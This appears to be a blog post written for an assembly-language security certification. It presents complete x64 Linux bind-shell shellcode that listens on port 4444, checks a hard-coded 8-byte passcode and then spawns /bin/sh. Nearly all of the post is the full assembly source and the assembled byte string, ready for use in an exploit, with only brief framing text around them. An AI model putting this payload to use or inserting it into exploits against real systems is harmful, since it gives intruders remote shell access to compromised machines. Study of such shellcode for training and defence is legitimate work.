Source: SecurityTube
This is x64 bits tcp bind shell with passcode, if you need more explications, please check my post about x32 bits bind shell, where you can found man about *nix socket programing
shell asm source
;Author - Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322 ;175 bytes global _start section .text _start: push byte 0x29 ; 41 - socket syscall pop rax push byte 0x02 ; AF_INET pop rdi push byte 0x01 ; SOCK_STREAM pop rsi cdq syscall ;copy socket descriptor to rdi for future use ;bind xchg rdi, rax xor rax, rax mov dword [rsp-4], eax ;INADDR_ANY mov word [rsp-6], 0x5c11 ;PORT 4444 mov byte [rsp-8], 0x2 ;AF_INET sub rsp, 0x8 push byte 0x31 ;49 bind pop rax mov rsi, rsp cdq add dl, 16 ;len syscall ;listen push byte 0x32 ;listen pop rax ;push byte 0x02 ;max clients ;pop rsi syscall push byte 0x2b ; accept pop rax sub rsp, 0x10 ; adjust xor rsi, rsi mov rsi, rsp ; pointer mov byte [rsp-1], 0x10 ;len sub rsp, 0x01 ; adjust cdq mov rdx, rsp ; pointer syscall ;read buffer mov rdi, rax ; socket xor rax, rax mov byte [rsp-1], al ;0 read sub rsp, 1 cdq push rdx ; 0 stdin lea rsi, [rsp-0x10] ; 16 bytes from buffer add dl, 0x10 ; len syscall ;test passcode mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex') push rdi ; save the socket lea rdi, [rsi] ; load string from address scasq ; compare jz accepted_passwd ; jump if equal ;exit if different :P xor rax, rax add al, 60 syscall accepted_passwd: pop rdi; socket push byte 0x03 pop rsi dup2_loop: dec rsi push byte 0x21 pop rax syscall jnz dup2_loop ; jump if not 0 push rsi; 0 ;execve ;push /bin//sh in reverse mov rbx, 0x68732f2f6e69622f push rbx mov rdi, rsp push rsi mov rdx, rsp push rdi mov rsi, rsp push byte 0x3b pop rax syscall
C output
unsigned char code[] =\ "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x48\x97\x48\x31\xc0\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x6a\x31\x58\x48\x89\xe6\x99\x80\xc2\x10\x0f\x05\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x48\x31\xf6\x48\x89\xe6\xc6\x44\x24\xff\x10\x48\x83\xec\x01\x99\x48\x89\xe2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x88\x44\x24\xff\x48\x83\xec\x01\x99\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f\x05\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57\x48\x8d\x3e\x48\xaf\x74\x07\x48\x31\xc0\x04\x3c\x0f\x05\x5f\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x56\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x56\x48\x89\xe2\x57\x48\x89\xe6\x6a\x3b\x58\x0f\x05";
Examples:
Correct passwd
Incorrect passwd
This shellcode was accepted to shell-storm.org and can be found here, special thank to @JonathanSalwan for accept it :)
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
No hay comentarios:
Publicar un comentario